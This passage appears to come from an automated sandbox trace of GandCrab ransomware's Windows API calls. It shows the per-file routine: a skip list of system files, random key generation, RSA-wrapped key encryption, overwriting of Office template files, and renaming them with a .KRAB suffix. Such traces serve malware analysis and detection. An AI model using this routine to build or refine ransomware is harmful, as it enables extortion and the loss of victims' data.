phKey=0x338dd30 | out: phKey=0x338dd30*=0x10239b8) returned 1 [0072.793] CryptGetKeyParam (in: hKey=0x10239b8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0072.793] CryptEncrypt (in: hKey=0x10239b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0072.794] GetLastError () returned 0x0 [0072.794] CryptDestroyKey (hKey=0x10239b8) returned 1 [0072.794] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0072.794] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328905[[fn=chevron accent]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0072.795] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0072.796] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0072.796] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x1093, lpOverlapped=0x0) returned 1 [0072.821] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xffffef6d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.821] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1093, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x1093, lpOverlapped=0x0) returned 1 [0072.821] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0072.822] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.825] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.825] CloseHandle (hObject=0x484) returned 1 [0072.827] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.827] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328905[[fn=chevron accent]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328905[[fn=chevron accent]].glox.krab")) returned 1 [0072.828] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.828] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0072.828] lstrcmpW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2=".") returned 1 [0072.828] lstrcmpW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="..") returned 1 [0072.828] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328908[[fn=Circle Process]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox" [0072.828] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0072.829] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox.KRAB") returned 145 [0072.829] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox") returned 140 [0072.829] lstrlenW (lpString=".glox") returned 5 [0072.829] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0072.829] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".glox ") returned 6 [0072.829] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.829] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox") returned 140 [0072.829] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox") returned 140 [0072.829] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="desktop.ini") returned 1 [0072.830] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="autorun.inf") returned 1 [0072.830] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="ntuser.dat") returned 1 [0072.830] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="iconcache.db") returned 1 [0072.830] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="bootsect.bak") returned 1 [0072.830] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="boot.ini") returned 1 [0072.830] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="ntuser.dat.log") returned 1 [0072.830] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="thumbs.db") returned 1 [0072.830] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0072.830] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0072.830] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0072.830] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="ntldr") returned 1 [0072.830] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="NTDETECT.COM") returned 1 [0072.830] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="Bootfont.bin") returned 1 [0072.830] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0072.830] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1011ab8) returned 1 [0072.831] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0072.831] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0072.831] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0072.832] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0072.832] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0072.832] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.832] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0072.832] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0072.833] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0072.833] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0072.833] CryptGenRandom (in: hProv=0x1012558, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0072.833] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0072.833] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.833] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0072.834] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023938) returned 1 [0072.834] CryptGetKeyParam (in: hKey=0x1023938, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0072.834] CryptEncrypt (in: hKey=0x1023938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0072.834] GetLastError () returned 0x0 [0072.834] CryptDestroyKey (hKey=0x1023938) returned 1 [0072.834] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0072.834] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1011ab8) returned 1 [0072.835] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023f78) returned 1 [0072.835] CryptGetKeyParam (in: hKey=0x1023f78, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0072.835] CryptEncrypt (in: hKey=0x1023f78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0072.835] GetLastError () returned 0x0 [0072.835] CryptDestroyKey (hKey=0x1023f78) returned 1 [0072.835] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0072.835] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328908[[fn=circle process]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0072.846] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0072.846] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0072.847] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x41a6, lpOverlapped=0x0) returned 1 [0072.880] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xffffbe5a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.880] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x41a6, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x41a6, lpOverlapped=0x0) returned 1 [0072.880] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0072.880] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.884] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.884] CloseHandle (hObject=0x484) returned 1 [0072.886] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.886] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328908[[fn=circle process]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328908[[fn=circle process]].glox.krab")) returned 1 [0072.887] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.887] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0072.887] lstrcmpW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2=".") returned 1 [0072.887] lstrcmpW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="..") returned 1 [0072.887] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328916[[fn=Converging Text]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox" [0072.887] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0072.888] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox.KRAB") returned 146 [0072.888] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox") returned 141 [0072.888] lstrlenW (lpString=".glox") returned 5 [0072.888] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0072.888] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".glox ") returned 6 [0072.888] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.888] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox") returned 141 [0072.888] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox") returned 141 [0072.888] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="desktop.ini") returned 1 [0072.888] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="autorun.inf") returned 1 [0072.888] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="ntuser.dat") returned 1 [0072.888] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="iconcache.db") returned 1 [0072.888] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="bootsect.bak") returned 1 [0072.888] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="boot.ini") returned 1 [0072.888] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="ntuser.dat.log") returned 1 [0072.888] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="thumbs.db") returned 1 [0072.888] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0072.888] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0072.889] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0072.889] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="ntldr") returned 1 [0072.889] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="NTDETECT.COM") returned 1 [0072.889] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="Bootfont.bin") returned 1 [0072.889] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0072.889] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0072.890] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0072.890] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0072.891] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0072.891] CryptGenRandom (in: hProv=0x1012558, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0072.891] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0072.891] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.891] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1011ab8) returned 1 [0072.892] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0072.892] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0072.894] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0072.894] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0072.894] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0072.894] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.894] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0072.895] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023978) returned 1 [0072.895] CryptGetKeyParam (in: hKey=0x1023978, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0072.895] CryptEncrypt (in: hKey=0x1023978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0072.895] GetLastError () returned 0x0 [0072.895] CryptDestroyKey (hKey=0x1023978) returned 1 [0072.895] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0072.895] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0072.896] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023c78) returned 1 [0072.896] CryptGetKeyParam (in: hKey=0x1023c78, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0072.896] CryptEncrypt (in: hKey=0x1023c78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0072.896] GetLastError () returned 0x0 [0072.896] CryptDestroyKey (hKey=0x1023c78) returned 1 [0072.896] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0072.896] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328916[[fn=converging text]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0072.897] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0072.898] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0072.898] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x2c74, lpOverlapped=0x0) returned 1 [0072.929] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xffffd38c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.929] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x2c74, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x2c74, lpOverlapped=0x0) returned 1 [0072.930] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0072.930] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.933] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.934] CloseHandle (hObject=0x484) returned 1 [0072.969] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.970] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328916[[fn=converging text]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328916[[fn=converging text]].glox.krab")) returned 1 [0072.971] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.971] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0072.971] lstrcmpW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2=".") returned 1 [0072.971] lstrcmpW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="..") returned 1 [0072.971] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328919[[fn=Hexagon Radial]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox" [0072.971] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0072.972] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox.KRAB") returned 145 [0072.972] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox") returned 140 [0072.972] lstrlenW (lpString=".glox") returned 5 [0072.972] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0072.972] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".glox ") returned 6 [0072.972] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.972] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox") returned 140 [0072.972] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox") returned 140 [0072.972] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="desktop.ini") returned 1 [0072.973] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="autorun.inf") returned 1 [0072.973] lstrcmpiW 